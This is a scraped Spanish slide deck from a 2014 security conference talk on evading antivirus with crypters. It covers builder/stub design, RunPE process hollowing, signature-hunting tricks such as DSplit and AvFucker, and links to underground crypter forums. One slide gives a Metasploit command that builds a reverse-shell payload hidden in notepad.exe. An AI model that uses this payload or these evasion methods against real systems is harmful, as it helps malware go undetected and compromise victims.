Evasionavsusodecrypters Mundohackerday2k14apasamar 140501045053 Phpapp02

Evasin de Anti-Virus:
Uso de Crypters
Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
Whoami
ncd:~ apasamar$ whoami

apasamar

apasamar@incide.es

@apasamar

a.k.a brajan

ncd:~ apasamar$ cat apasamar.cv

Ingeniero superior y Mster en
seguridad de la informacin

Socio fundador de INCIDE:

Expertos en prueba electrnica

Forensics / Periciales

Respuesta a incidentes

Consultora/Auditora de Seguridad

!
ncd:~ apasamar$ rm apasamar.cv
de qu va esto...
Introduccin

AVs como funcionan

Tipos de malware y deteccin AVs

Medidas de evasin

Auto-cifrado, Polimorfismo, Ofuscacin, Compresin

Crypters

tipos y funcionamiento

stub

stub FUD

tcnicas Modding

Recursos
introduccin
MALWARE = $$$$$$$$$

BOTNETS, APT,
RANSOMWARE

Empresas AVs >
Detectar MALWARE

Malos: INDETECTAR
MALWARE
introduccin
MALWARE = $$$$$$$$$

BOTNETS, APT,
RANSOMWARE

Empresas AVs >
Detectar MALWARE

Malos: INDETECTAR
MALWARE
introduccin
Objetivo de los Malos:
introduccin
Objetivo de los Malos:
AVs howto
Los AntiVirus escanean binarios EN DISCO

NO analizan la memoria, sino los binarios
en disco que arrancan procesos

Buscan firmas: cadenas binarias (BBDD)

Buscan elementos/tcnicas maliciosas
(Heurstica): APIS, funciones, XOR, etc

Sandbox (ejecucin parcial): bsqueda de

tcnicas de descifrado, etc
AV
SCAN
PROCESO
AVs howto
RAM
EJECUTABLE
DISCO
AVs howto
Proceso anlisis de los AVs:
Ataques
AVs howto
Recomendado:

Abusing File Processing in Malware
Detectors for Fun and Profit (2012)
Suman Jana and Vitaly Shmatikov
The University of Texas at Austin
AVs howto
Metasploit Framework (Rapid7)

Community Edition:

msfpayload
windows/shell/
reverse_tcp LHOST=192.168.1.75
LPORT=4444 R | msfencode -c 5 -e
x86/shikata_ga_nai -x notepad.exe
> notepad2.exe
Pro Edition:

Generate
Payloads
AV-evading Dynamic
tipos de malware y
deteccin AVs
Programas espa comerciales: (white list,
firmados)

e-blaster

007

perfect keylogger
tipos de malware y
deteccin AVs
Malware recin creado:

deteccin baja (sin firmas)

posible deteccin heurstica
tipos de malware y
deteccin AVs
Malware existente: (muy conocidos,
firmas y heurstica)

troyanos

downloaders

stealers

reverse shells

...
cmo se puede indetectar

el malware ya detectado ?
C r y p t e r s:

Software que permite cifrar
CUALQUIER MALWARE para
hacerlo indetectable a los antivirus.

La rutina de descifrado tiene que

poder ejecutarse (no se cifra)
crypters
builder / stub
Builder:

Encargado de crear el ejecutable
compuesto por el STUB y el
MALWARE CIFRADO

Stub:

Encargado de descifrar el MALWARE
CIFRADO y ejecutarlo
builder / stub
!
CRYPTER

(Builder)!
!
!
!
STUB !
!
!
!
CRYPTER + STUB
exe

dll

recurso
MALWARE DETECTADO
XOR, RC4, ...

STUB
MALWARE CIFRADO
builder / stub
MALWARE CIFRADO
STUB
Separador
Separador
STUB
KEY
MALWARE CIFRADO
Tambin se puede usar un recurso
builder / stub
Tipos de crypters:

ScanTime

RunTime
stub
ScanTime
STUB
AV
MALWARE CIFRADO
MALWARE DETECTADO
DISCO
RunTime
AV
MALWARE DETECTADO
stub
RAM
STUB
MALWARE CIFRADO
DISCO
stub
Componentes STUB:

Rutina Decrypt

RunPe

!
PROCESO

1
RunPE o Dynamic Forking
PROCESO

2
EP I
EP 2
CreateProcess (CREATE_SUSPENDED)
GetThreadContext
ReadFile
ResumeThread
WriteProcessMemory
SetThreadContext
BaseAddress 21
+8
PEB
EBX
EAX
FUD
Objetivo: Stub FUD (Full UnDetectable)

Indeteccin desde Fuente (Source)

Indeteccin desde Binario

Cmo?

MODDING
modding source
A mano o con ofuscadores:

Reemplazar funciones (SPLIT,..)

Cifrados: RC4 y XOR quemadas

Reemplazar y/o ofuscar funciones/strings/variables y Cifrar con

rot13 o Hex

Alternativas: TEA, DES, etc

RunPE alternativos

APIs Falsas

TLB (Tab Library File)

Trash code

modding binario
Indeteccin desde Binario:

Se utilizan diferentes tcnicas como:

Dsplit/AvFucker

SignatureFucker

Hexing

RIT

XOR y variantes

Tips

modding binario
Se modea el STUB, el BUILDER no es parte del

malware in the wild

Se buscan las FIRMAS o puntos de deteccin

Firmas sencillas

Firmas Mltiples

Heurstica
AVs howto
Recomendado:

Bypassing Anti-Virus
Scanners (2012)
InterNOT Security Team
modding binario
Rutina CIFRADO/DESCIFRADO dentro del

STUB?

EP
Firmas
OLD EP
stub.exe
Firmas
NEW EP
CIFRADO
stub.exe
Descifrado
modding binario
SCAN DEL STUB ORIGINAL

modding binario
RUTINA DE CIFRADO

NEW EP

INSERTAR RUTINA

.text SECTION

desde 1050

hasta import table

modding binario
RUTINA CIFRADO EN NEW EP

modding binario
RUTINA DESCIFRADO Y EJECUCIN EN

NEW EP

modding binario
16 AVs KO
SCAN DEL STUB MODIFICADO

modding binario
TCNICAS:

Dsplit/AvFucker

SignatureFucker

Hexing

RIT

XOR y variantes

Tips
modding binario
Tcnica DSplit:

Cabecera
Cuerpo EXE
1000 bytes
Cabecera Cuerpo EXE

2000 bytes
Cabecera
Cuerpo EXE
3000 bytes
Cabecera
Cabecera
Cuerpo EXE
Nx1000 bytes
Cuerpo EXE
modding binario
Tcnica AvFucker:

Cabecera
Cuerpo EXE
1000 bytes
Cuerpo EXE
Cabecera 0000000000
1000 bytes
Cabecera
0000000000
Cuerpo EXE
1000 bytes
Cabecera
0000000000
Cuerpo EXE
Cabecera
1000 bytes
Cuerpo EXE
0000000000
modding binario
Tcnica RIT

localizar firma

si son instrucciones partir flujo

saltar a otro punto (hueco)

finalizar las instrucciones

retornar al punto posterior

!
modding binario
Tcnica XOR

localizar firma/s

aplicar XOR con un valor p.e. 22

Modificar EP o saltar a un hueco

aplicar XOR 22

retornar al punto posterior

!
modding binario
Detectado (EP):
XOR de los bytes detectados:
Nuevo EP ( Instruccione XOR reverso):
otras tcnicas
Aadir APIs Falsas

Edicin Hexadecimal de cadenas

Mover/cambiar direcciones de llamadas
a las funciones

Cambiar llamadas por nombre/offeset

Introducir en STUB la funcin de la DLL
detectada

!
recursos
http://www.indetectables.net

http://www.udtools.net

http://www.masters-hackers.info

http://www.level-23.biz/

http://www.corp-51.net/

http://www.underc0de.org

!
P R E G U NTA S ?
Avda. Diagonal, 640 6 Planta
08017 Barcelona
info@incide.es
http://www.incide.es
http://www.twitter.com/1NC1D3
http://www.atrapadosporlosbits.com
http://www.youtube.com/incidetube
Companies > INCIDE - Investigacin Digital
Tel./Fax. +34 932 546 277 / +34 932 546 314

Evasionavsusodecrypters Mundohackerday2k14apasamar 140501045053 Phpapp02

Cargado por

Información del documento

Derechos de autor

Formatos disponibles

Compartir este documento

Compartir o incrustar documentos

Opciones para compartir

¿Le pareció útil este documento?

¿Este contenido es inapropiado?

Copyright:

Formatos disponibles

Evasionavsusodecrypters Mundohackerday2k14apasamar 140501045053 Phpapp02

Cargado por

Copyright:

Formatos disponibles

Evasin de Anti-Virus:

Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14

ncd:~ apasamar$ rm apasamar.cv

Empresas AVs >

Empresas AVs >

Buscan firmas: cadenas binarias (BBDD)

Sandbox (ejecucin parcial): bsqueda de

cmo se puede indetectar

La rutina de descifrado tiene que

XOR, RC4, ...

Tambin se puede usar un recurso

RunPE o Dynamic Forking

Reemplazar funciones (SPLIT,..)

Cifrados: RC4 y XOR quemadas

Reemplazar y/o ofuscar funciones/strings/variables y Cifrar con

Alternativas: TEA, DES, etc

Indeteccin desde Binario:

Se utilizan diferentes tcnicas como:

Se modea el STUB, el BUILDER no es parte del

Se buscan las FIRMAS o puntos de deteccin

Rutina CIFRADO/DESCIFRADO dentro del

SCAN DEL STUB ORIGINAL

RUTINA CIFRADO EN NEW EP

RUTINA DESCIFRADO Y EJECUCIN EN

SCAN DEL STUB MODIFICADO

Cabecera Cuerpo EXE

XOR de los bytes detectados:

Nuevo EP ( Instruccione XOR reverso):

Cambiar llamadas por nombre/offeset

También podría gustarte